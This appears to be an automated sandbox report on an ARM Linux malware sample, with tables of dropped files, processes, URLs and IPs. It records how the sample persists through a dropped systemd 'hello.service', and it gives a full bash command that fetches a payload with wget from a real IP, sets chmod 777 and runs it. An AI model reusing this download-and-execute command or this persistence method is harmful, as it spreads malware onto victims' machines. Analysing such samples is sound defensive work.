Files

| File Path | Type | Category | Malicious |
|---|---|---|---|
| 5.elf | ELF 32-bit LSB executable, ARM, EABI4 version 1 (SYSV), statically linked, stripped | initial sample | |
| /tmp/5 | ELF 32-bit LSB executable, ARM, EABI4 version 1 (SYSV), statically linked, stripped | dropped | |
| /etc/systemd/system/hello.service | ASCII text | dropped | |
| /memfd:snapd-env-generator (deleted) | ASCII text | dropped | |
Processes

| Path | Cmdline | Malicious |
|---|---|---|
| /tmp/5.elf | /tmp/5.elf | |
| /tmp/5.elf | - | |
| /bin/sh | sh -c "systemctl daemon-reload > /dev/null 2>&1" | |
| /bin/sh | - | |
| /usr/bin/systemctl | systemctl daemon-reload | |
| /tmp/5.elf | - | |
| /bin/sh | sh -c "systemctl start hello.service > /dev/null 2>&1" | |
| /bin/sh | - | |
| /usr/bin/systemctl | systemctl start hello.service | |
| /usr/bin/xfce4-panel | - | |
| /usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 | /usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 /usr/lib/x86_64-linux-gnu/xfce4/panel/plugins/libsystray.so 6 12582920 systray "Notification Area" "Area where notification icons appear" | |
| /usr/bin/xfce4-panel | - | |
| /usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 | /usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 /usr/lib/x86_64-linux-gnu/xfce4/panel/plugins/libstatusnotifier.so 7 12582921 statusnotifier "Status Notifier Plugin" "Provides a panel area for status notifier items (application indicators)" | |
| /usr/bin/xfce4-panel | - | |
| /usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 | /usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 /usr/lib/x86_64-linux-gnu/xfce4/panel/plugins/libpulseaudio-plugin.so 8 12582922 pulseaudio "PulseAudio Plugin" "Adjust the audio volume of the PulseAudio sound system" | |
| /usr/bin/xfce4-panel | - | |
| /usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 | /usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 /usr/lib/x86_64-linux-gnu/xfce4/panel/plugins/libxfce4powermanager.so 9 12582923 power-manager-plugin "Power Manager Plugin" "Display the battery levels of your devices and control the brightness of your display" | |
| /usr/bin/xfce4-panel | - | |
| /usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 | /usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 /usr/lib/x86_64-linux-gnu/xfce4/panel/plugins/libnotification-plugin.so 10 12582924 notification-plugin "Notification Plugin" "Notification plugin for the Xfce panel" | |
| /usr/bin/xfce4-panel | - | |
| /usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 | /usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 /usr/lib/x86_64-linux-gnu/xfce4/panel/plugins/libactions.so 14 12582925 actions "Action Buttons" "Log out, lock or other system actions" | |
| /usr/lib/systemd/systemd | - | |
| /usr/lib/systemd/system-environment-generators/snapd-env-generator | /usr/lib/systemd/system-environment-generators/snapd-env-generator | |
| /usr/lib/systemd/systemd | - | |
| /bin/bash | /bin/bash -c "sleep 10; rm -rf /tmp/5; wget http://103.136.41.100/5 -O /tmp/5; chmod 777 /tmp/5; /tmp/5 .p1 > /dev/null 2>&1;" | |
| /bin/bash | - | |
| /usr/bin/sleep | sleep 10 | |
| /bin/bash | - | |
| /usr/bin/rm | rm -rf /tmp/5 | |
| /bin/bash | - | |
| /usr/bin/wget | wget http://103.136.41.100/5 -O /tmp/5 | |
| /bin/bash | - | |
| /usr/bin/chmod | chmod 777 /tmp/5 | |
| /bin/bash | - | |
| /tmp/5 | /tmp/5 .p1 | |
URLs

| Name | IP | Malicious |
|---|---|---|
| http://%d.%d.%d.%d/%s | unknown | |
| http://1/wget.sh | unknown | |
| http://103.136.41.100/5 | 103.136.41.100 | |
| http://schemas.xmlsoap.org/soap/encoding/ | unknown | |
| http://9/curl.sh | unknown | |
| http://%d.%d.%d.%d/2; | unknown | |
| http://schemas.xmlsoap.org/soap/envelope/ | unknown | |
Domains

| Name | IP | Malicious |
|---|---|---|
| daisy.ubuntu.com | 162.213.35.25 | |
IPs

| IP | Domain | Country | Malicious |
|---|---|---|---|
| 103.136.41.100 | unknown | India | |
Memdumps

| Base Address | Regiontype | Protect | Malicious |
|---|---|---|---|